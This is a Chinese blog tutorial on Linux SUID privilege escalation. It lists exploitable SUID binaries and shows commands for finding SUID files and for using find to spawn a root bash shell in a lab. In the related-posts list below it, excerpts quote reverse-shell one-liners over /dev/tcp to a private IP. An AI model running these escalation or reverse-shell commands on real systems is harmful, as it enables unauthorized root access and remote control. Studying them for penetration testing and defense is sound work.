Linux下SUID提权方法

已于 2022-03-20 19:13:48 修改
阅读量3.9k 收藏 6
点赞数 3
分类专栏: 内网攻防 文章标签: linux中suid提权
于 2021-10-29 13:06:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/121032305
版权

目录

SUID

1. 利用find文件提权

vulnhub靶机DC-1渗透—SUID提权

SUID

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。

已知的可用来提权的linux可行性的文件列表如下:

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有者即root的权限去执行。意思就是当普通用户执行2.txt时会拥有root权限

-rwsr-xr-x –用's'字符代替'-'表示SUID位被设置

chmod u+s 文件名

 我们可以用以下命令发现系统上运行的所有SUID可执行文件。

#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

1. 利用find文件提权

实验环境:

假如我们现在拿到了一个网站服务器的shell,但是权限是普通用户,我们现在需要提权到 root 用户权限。

 此时,我们首先查看具有root用户权限的SUID文件

find / -perm -u=s -type f 2>/dev/null

这里我们发现了find文件(因为实验需要,这里find文件的suid权限是我自己加上去的)

 继续查看find信息,确实是root权限的suid文件

  接下来我们就用find进行权限提升,执行如下命令,显示root

/usr/bin/find 系统中存在的文件名 -exec 命令 \;

 即,我们可以继续执行以下命令,可以看到获取的shell为root权限。

find /etc/passwd -exec /bin/bash -p \;

 ps:这里也可以通过nc或则python脚本进行反弹,但本质上目的都是获取一个root权限的shell。而且通过nc或者python脚本反弹的shell很可能还是普通用户权限,所以建议直接使用上面那种方法。

vulnhub靶机DC-1渗透—SUID提权

——> https://chenchena.blog.csdn.net/article/details/123617568

谢北先生
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux suid提权原理,Linux SUID提权
weixin_32081489的博客
05-13 913
概述findNmaplessbashvim概述SUIDLinux的一种权限机制,具有这种权限的文件会在其执行,使调用者暂获得该文件拥有者的权限,如果拥有SUID权限,那么就可以利用系统的二进制文件和工具进行root提权。目前可以用来提权Linux可执行文件列表nmapvimfindbashmorelessnanocp用于查找SUID命令可执行文件的命令find / -perm -u=...
简谈SUID提权
2401_84466336的博客
05-28 976
SUID (Set UID)是Linux的一种特殊权限,其功能为用户运行某个程序,如果该程序有SUID权限,那么程序运行为进程,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程,调用者会暂获得该文件的所有者权限,且该权限只在程序执行的过程有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录,如果ls。
linux系统suid提权
focus on security
05-19 5533
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux的一种特殊权限,其功能为用户运行某个程序,如果该程序有SUID权限,那么程序运行为进程,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程,调用者会暂获得该文件的所有者权限,且该权限只在程序执行的过程有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录,如果
【Try to Hack】Linux suid提权
开心星人的博客
06-20 636
SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix,当一个程序运行候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户的(程序/文件)所有者的权限来运行一个程序/文件用户在执行程序/文件/命令的候,将获取文件所有者的权限以及所有者的UID和GID。如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程,是root权限。suid权限仅对二进制程序有效(binary program
Linux:SUID提权
Elite的博客
03-05 2204
以find命令为例,讲解SUID提权原理
Linux利用Suid提权实验
qq_45813384的博客
02-20 1043
普通用户在执行特殊的Suid命令的候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令的命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash。
Linux提权SUID提权
weixin_51692662的博客
08-22 2034
linux提权suid
Linux-suid提权
liver100day的博客
11-16 1367
ww
Linux sudo suid提权练习
BlusKing
04-18 351
Linux利用sudo和多种suid程序简单进行提权
linuxSUID提权以及文件权限问题
黑锤的博客
11-25 1744
要讲到suid提权的话,首先应该就要非常清楚地知道linux文件权限的相关问题。 在linux系统上有着非常严格的权限控制,如果想对某个文件执行某种操作的话,必须具有对应的权限方可执行成功。 linux下的文件的权限类型一般包括读、写、执行。对应的字母为r、w、x。 linux下权限有三种分组分别为拥有者、群组、其他组。每个文件都可以针对这三个组,设置不同的rwx(读写执行)权限。 在Linux...
Linux使用suid vim.basic文件实现提权
09-14
这种方式在安全环境是不允许的,但在渗透测试或漏洞分析,了解这种提权方法有助于提升网络安全意识和防护能力。当然,对于系统管理员来说,定期检查和限制不必要的SUID文件是防范此类攻击的重要措施。
Linux提权扫描脚本
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统,权限分为三类:用户权限、组权限和所有者权限。...
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux提权手法总结以及 Linux提权exp集合
02-22
压缩包的"Linux提权手法总结.pdf"可能会详细介绍这些提权方法的原理、实战技巧及防御策略。而"linux提权exp大全.zip"则可能包含各种公开的提权exploit代码,供安全研究人员学习和测试系统防护措施。这些资源对于...
Linux下非交互式提权详解
09-15
本文主要讲解了在Linux环境下如何进行非交互式提权,并提供了相关工具和方法。在无法反弹shell的情况下,这种方法尤为实用,因为它允许在没有交互环境的情况下运行提权工具并检查结果。 首先,文章提到了一个简单...
基于Java开发的银行管理系统后台bankproject-master.zip
07-26
基于Java开发的银行管理系统后台bankproject-master.zip
基于Java实现的企业考勤管理系统(源代码+数据库SQL).rar
07-26
基于Java实现的企业考勤管理系统(源代码+数据库SQL).rar
【SCI1区】Matlab实现三角测量拓扑聚合优化器TTAO-Transformer-GRU故障诊断算法研究.rar
最新发布
07-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
linux suid提权
03-16
SUID是一种特殊的权限位,当一个可执行文件被设置了SUID位后,它在执行就会以文件所有者的权限来执行,而不是以执行者的权限来执行。这种特性可以被滥用来进行提权攻击,即攻击者通过执行一个SUID文件来获取root权限。在Linux系统SUID文件通常是一些系统工具,如passwd、ping等。攻击者可以通过利用这些工具的漏洞来获取root权限。为了防止SUID提权攻击,管理员应该定期检查系统SUID文件,并限制它们的使用权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢北先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值